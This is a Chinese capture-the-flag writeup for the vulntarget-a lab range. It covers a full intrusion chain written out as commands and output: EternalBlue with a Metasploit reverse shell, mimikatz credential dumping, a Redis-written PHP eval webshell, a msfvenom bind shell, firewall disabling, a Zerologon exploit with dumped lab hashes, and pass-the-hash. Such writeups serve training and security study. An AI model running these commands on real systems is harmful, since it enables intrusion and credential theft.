vulntarget靶场系列-a-writeup

news2024/11/30 14:37:58

网络配置

外网WIN7:
ip1: 192.168.127.91/255.255.255.0 ,gw:192.168.127.2 (NAT模式)
ip2:10.0.20.98-vmnet1 (仅主机模式)
域主机成员:
10.0.20.99-vmnet1(仅主机模式)
10.0.10.111-vmnet2(仅主机模式)
域控:
10.0.10.110-vmnet2(仅主机模式)
密码配置:
Win7:win7/admin
win2016:Administrator/Admin@123、vulntarget.com\win2016   Admin#123
win2019:vulntarget.com\administrator   Admin@666

信息收集

扫描主机

arp-scan  -l
扫描同一网段中的存活主机
发现一个存活主机: 192.168.127.91

扫描端口

扫描一下存活靶机的ip地址

nmap -sC -T4 192.168.127.91
发现目标系统为win7,且开放了445端口,尝试利用永恒之蓝(ms17-010)打一波目标系统

内网主机渗透

在 kali 中输入命令:
msfconsole
msf 6> search 17-010
msf 6> use 0
msf 6> set payload windows/x64/meterpreter/reverse_tcp
msf 6> set lport 6666
msf 6> set lhost 192.168.127.129
msf 6> set rhosts  192.168.127.91
msf 6> run
meterpreter>shell  
C:\Windows\System32>ipconfig
发现有些乱码,直接在设置一下
C:\Windows\System32>CHCP 65001     #65001 UTF-8代码页
C:\Windows\System32>ipconfig  # 发现有两个网段,一个是192.168.127的网段,另一个就是10.0.20网段
C:\Windows\System32>whomai  #查看当前用户得权限为system权限
C:\Windows\System32>tasklist/svc  #查看进程,发现系统中没有杀软
C:\Windows\System32>exit #退出shell命令终端
meterpreter>load kiwi  #加载mimikataz模块
meterpreter>creds_all  #获取当前所有用户得登录凭证,发现用户名为win7,密码为:admin

Web渗透

直接访问,http://192.168.127.91/,发现是通达OA
查看通达OA的版本号,当前版本为11.3
http://192.168.127.91/inc/expired.php
通过搜索引擎搜索通达11.3存在文件包含漏洞
参考地址:https://blog.csdn.net/hackzkaq/article/details/115900500
这里使用一键图形化工具获得webshell
使用蚁剑连接成功
同样在 蚁剑的命令终端下查看当前用户的权限为system权限

横向渗透

进程迁移
获得shell时,该shell是极其脆弱,所以需要移动这个shell把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作,这样使渗透更难被检测到。自动迁移进程命令(run post/windows/manage/migrate)后,系统会自动寻找合适的进程然后迁移
meterpreter > run post/windows/manage/migrate   # 从1080的spoolsv.exe迁移到了noepad.exe的4800进程
查看本地网络连接子网段
meterpreter > run  get_local_subnets
添加一条动态路由
meterpreter > run autoroute -s 10.0.20.0/24
或者
meterpreter > background
meterpreter >sessions
msf6 exploit(windows/smb/ms17_010_eternalblue) >use post/multi/manage/autoroute
msf6 exploit(windows/smb/ms17_010_eternalblue) >set session 1
msf6 exploit(windows/smb/ms17_010_eternalblue) >run
meterpreter > background
发现存活主机
msf6 exploit(windows/smb/ms17_010_eternalblue) >use post/windows/gather/arp_scanner
msf6 exploit(windows/smb/ms17_010_eternalblue) >set session 1
msf6 exploit(windows/smb/ms17_010_eternalblue) >set rhosts 10.0.20.1-254
msf6 exploit(windows/smb/ms17_010_eternalblue) >run
发现了另一台存活主机10.0.20.99
开启socks5代理
msf6 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run

端口扫描

首先先要需要修改/etc/proxychain4.conf配置文件

vim   /etc/proxychains4.conf
socks5  127.0.0.1  1080
通过nmap扫描目标IP的常用端口
proxychains nmap -sT -Pn 10.0.20.99 -p22,23,80,139,445,1433,3306,3389,6379,8080
发现 10.0.20.99主机开放了6379和80端口
这里使用本地socks5代理客服端proxifier软件
通过 dirsearch进行扫描,发现目标存在phpinfo.php敏感信息页面
python3   dirsearch.py  -l url.txt  -t 10  -e *   -i 200,302  --format csv -o C:\Users\backlion\Desktop\dirsearch-master\xxx.com.csv
或者攻击机kali下执行
proxychains python dirsearch.py -uhttp://10.0.20.99 -i 200
proxychains dirsearch -u “http://10.0.20.99” --proxy=socks5://127.0.0.1:1080 -t 5 
访问phpinfo.php页面发现暴露了网站的绝对路径: C:/phpStudy/PHPTutorial/WWW/
http://10.0.20.99/phpinfo.php
http://10.0.20.99/l.php

Redis未授权访问

通过 redis-cli 命令可无密码进行远程连接
proxychains redis-cli -h 10.0.20.99

Redis写入webshell

10.0.20.99:6379> CONFIG set dir "C:/phpStudy/PHPTutorial/WWW/"  #切换到可写入shell的绝对路径
10.0.20.99:6379> set x "\n\n\n<?php @eval($_POST['x']);?>\n\n\n"   #写入一句话木马
10.0.20.99:6379> config set dbfilename shell.php  #设置文件名为shell.php
10.0.20.99:6379> save
这里通过本地主机上的蚁剑设置代理,且连接webshell
查看当前用户权限为syestem

上传MSF后门

生成正向shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=3333 -f exe > shell.exe
使用蚁剑上传shell.exe到10.0.20.99,并执行

配置监听器

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 3333
set RHOST 10.0.20.99
run

               
关闭防火墙
netsh firewall set opmode mode=disable
蚁剑命令终端中运行shell.exe
收集同网段主机
meterpreter > arp
扫出10.0.10.110网段
迁移进程
run post/windows/manage/migrate
meterpreter > sysinfo
meterpreter > shell
C:\phpStudy\PHPTutorial\WWW>CHCP 65001
收集IP信息
C:\phpStudy\PHPTutorial\WWW>ipconfig/all
有域存在,查看域控计算机名
C:\phpStudy\PHPTutorial\WWW>net group "domain controllers" /domain
查看域管理员
C:\phpStudy\PHPTutorial\WWW>net group "enterprise admins" /domain

域提权

添加路由
meterpreter > run post/multi/manage/autoroute
meterpreter > run autoroute -p
meterpreter > run post/windows/gather/enum_domain
proxychains4 nmap -Pn -sT 10.0.10.110 -p6379,80,8080,445,139
下载impacket包,并进行安装
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python3 -m pip install -r requirements.txt
python3 -m pip install .
下载CVE-2020-1472EXP
git clone  https://github.com/dirkjanm/CVE-2020-1472.git
cd CVE-2020-1472
执行EXP
proxychains python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
获取域管理员hash
cd  /opt/impacket/examples
proxychains python3 secretsdump.py vulntarget.com/WIN2019\$@10.0.10.110 -no-pass
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:d0b248a756f62bbef5b286c7be19c7a9:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:414bc47994e3bf616da9e115ba8c7e528ce17315734337479d6f67df3ca6e682
WIN2016$:aes128-cts-hmac-sha1-96:8b30d9d37e7f7f474124382d2fe75950
WIN2016$:des-cbc-md5:6d97313875e362c8
拿到管理员hash,执行提权exp
proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15  Administrator@10.0.10.110
开启3389远程桌面端口:
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

直接3389登录:proxychains  rdesktop 10.0.10.110

账号:balsec.com\administrator   密码:Admin@666

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/87476.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

C++11标准模板(STL)- 算法(std::max_element)

定义于头文件 <algorithm> 算法库提供大量用途的函数&#xff08;例如查找、排序、计数、操作&#xff09;&#xff0c;它们在元素范围上操作。注意范围定义为 [first, last) &#xff0c;其中 last 指代要查询或修改的最后元素的后一个元素。 返回范围内的最大元素 st…

2022 12月15日 每日面试题(MyBatis)

&#x1f3e0;个人主页&#xff1a;不会写代码的满满 &#x1f9d1;个人简介&#xff1a;大家好&#xff0c;我是满满&#xff0c;一个想要与大家共同进步的男人&#x1f609;&#x1f609; 目前状况&#x1f389;&#xff1a;开学即将大三&#xff0c;目标就是半年内找到一份实…

【云计算与大数据技术】资源管理、调度模型策略的讲解

一、资源管理模型 集群资源管理模型通常由两个部分组成&#xff0c;即资源表示模型和资源分配模型&#xff0c;由于这两个部分是耦合的&#xff0c;所有优化集群资源管理时需要同时结合这两个部分考虑&#xff0c;资源表示模型用于描述集群资源的组织方式&#xff0c;是集群资…

【Contrastive Learning:IVIF】

CLF-Net: Contrastive Learning for Infrared and Visible Image Fusion Network &#xff08;LF-Net&#xff1a;红外与可见光图像融合网络的对比学习&#xff09; &#xff08;总结&#xff1a;就是更像谁就选谁&#xff09; 本文提出了一种基于对比学习的红外和可见光图像融…

透过ChatGPT的进化足迹,OpenAI传达了哪些信号?

古希腊神话中&#xff0c;一位名叫赫尔墨斯的神&#xff0c;会充当人神之间的信使&#xff0c;穿着带有双翼的飞鞋&#xff0c;行走在神明与人类之间。根据《荷马史诗》的记载&#xff1a;“在天神中&#xff0c;赫尔墨斯是最喜欢引导凡人前行的。”这句话用来形容OpenAI与AI的…

佳力奇IPO过会:拟募资11亿 西安现代与华控湖北是股东

雷递网 雷建平 12月13日安徽佳力奇先进复合材料科技股份公司&#xff08;简称&#xff1a;“佳力奇”&#xff09;日前IPO过会&#xff0c;准备在深交所创业板上市。佳力奇计划募资11.22亿元&#xff0c;其中&#xff0c;6.2亿元用于先进复合材料数智化生产基地建设项目&#x…

Google Cloud database options (关于GCP数据库怎么选择)

背景 GCP提供了几种您可以从中选择的数据库服务&#xff0c;可是究竟该用哪个呢&#xff1f; Cloud SQL:Cloud Spanner:BigQuery:Cloud Bigtable:Cloud Firestore:Firebase Realtime Database:Cloud Memorystore: from Google Cloud database options sort out by zhengkai.…

【自然语言处理】隐马尔科夫模型【Ⅱ】隐马尔科夫模型概述

有任何的书写错误、排版错误、概念错误等&#xff0c;希望大家包含指正。 由于字数限制&#xff0c;分成六篇博客。 【自然语言处理】隐马尔可夫模型【Ⅰ】马尔可夫模型 【自然语言处理】隐马尔科夫模型【Ⅱ】隐马尔科夫模型概述 【自然语言处理】隐马尔科夫模型【Ⅲ】估计问题…

14、TheFatRat木马生成工具-创建后门或payload

kail攻击主机&#xff1a; Kali 192.168.11.106靶机&#xff1a;windows server 2008 r2 192.168.11.134 x64 32位一、TheFatRat介绍 TheFatRat创建的后门或者payload&#xff0c;可以在Linux&#xff0c;Windows&#xff0c;Mac和Android上等多种平台上执行&#xff0c;可生…

九、JavaScript——数据类型_数值

一、数值 定义及规范&#xff1a; 数值 &#xff08;Number) -在JS中所有的整数和浮点数(小数) 都是Number JS中的数值并不是无限大的&#xff0c;当数值超过一定后会显示近似值&#xff0c;JavaScript表达的最大整数是&#xff1a;9007199254740992 Infinity 是…

设计模式总览——枯燥的知识又增加了

从今天开始呢&#xff0c;阿Q就带大家了解一下 java 的设计模式&#xff0c;并从中选出比较常用的几种设计模式进行总结。首先呢&#xff0c;先给大家说一下设计模式到底是什么。 设计模式 设计模式&#xff08;Design pattern&#xff09;代表了最佳的实践&#xff0c;通常被…

iOS备用机自动充电方案

搬到新加坡以后&#xff0c;我拥有了很多张手机卡&#xff1a;1张国内的电话卡&#xff0c;回国时使用1张新加坡电话卡&#xff0c;本地使用1张马来西亚电话卡&#xff0c;去马来西亚旅行时使用1张英国电话卡&#xff0c;去欧洲旅行时使用相对应的&#xff0c;我需要有备用机来…

DSP篇--C6701功能调试系列之 FLASH测试

目录 1、 FLASH介绍 2、 FLASH功能测试 调试的前期准备可以参考前面的博文&#xff1a;DSP篇--C6701功能调试系列之前期准备_nanke_yh的博客-CSDN博客 1、 FLASH介绍 FLASH作为EMIF的外设&#xff0c;对其操作就需要根据EMIF相关配置来确定FLASH的地址了。 一般地&#xff…

Django第二天学习记录

1.对于路由配置的正则化补充(re_path的正则匹配) 对于第一天学习的path转换器过于暴力&#xff0c;对于需要匹配的内容不能很精准的进行转换。为了实现精准的字符串匹配规则&#xff0c;因此引入了re_path&#xff08;reg,view,namexxx&#xff09;进行路由规则的精确匹配。 正…

关于云计算的 7 大误区

一直以来&#xff0c;有几个关于云计算的误区四处传播&#xff0c;散布恐惧和不必要的不信任。在使用新技术之前研究新技术并检查事实是很好的。让我们来看看关于云计算的 7 大误区&#xff0c;看看哪些是真的&#xff0c;哪些不是。 1.云迁移可能很麻烦 云迁移包括许多过程&am…

KMP算法讲解与实现

0、概述 KMP是用于字符串查找/匹配的算法&#xff1b; KMP算法的时间复杂度&#xff1a;O(n)O(n)O(n)&#xff1b; KMP算法的核心&#xff1a; 1&#xff09;如何理解 next 数组2&#xff09;如何利用 next 数组加速匹配过程&#xff0c;优化时的两个实质 KMP算法的实现 1…

推荐|资深架构师 10 年 10 条干货职场心得

出道这么些年&#xff0c;跳过好多公司&#xff0c;除了国企其他的基本上都去过&#xff0c;甲方、乙方、外包、外企、互联网公司、创业公司…总结下来有这么些体会&#xff0c;希望能对你和大家有些参考价值。1. 保持学习可能离开了学校之后&#xff0c;所有的学习几乎都出于工…

b站黑马的Vue快速入门案例代码——图片切换(类似手动播放的轮播图)

目录 目标效果&#xff1a; 重点原理&#xff1a; 1.用数组储存图片的数据 2.v-bind指令可以设置元素属性 e.g.src 语法 v-bind:属性名表达式 简写【实际开发常用】 :属性名表达式 3.v-show和v-if都可以切换元素的显示/隐藏状态 (1)频繁切换显示/隐藏的dom元素用 v…

Opencv项目实战:17 贪吃蛇游戏

目录 0、项目介绍 1、效果展示 2、项目搭建 3、项目代码展示与讲解 4、项目资源 5、项目总结 0、项目介绍 这次是一个有意思的计算机视觉游戏——贪吃蛇&#xff0c;我们以食指为蛇头&#xff0c;不断的移动我们的手指&#xff0c;当吃到甜甜圈的时候&#xff0c;蛇身增…

浅谈字节码增强技术系列2-Asm与Cglib

作者&#xff1a;董子龙 前言 记得那是2022年秋天的第一场雨&#xff0c;比2021年来的稍晚一些&#xff0c;在那个秋雨朦胧的下午&#xff0c;正在工位上奋笔疾书的我突然听到了前面波哥对着手机听筒说出来的"温柔"的话语&#xff1a;说说你了解的spring-aop。话音…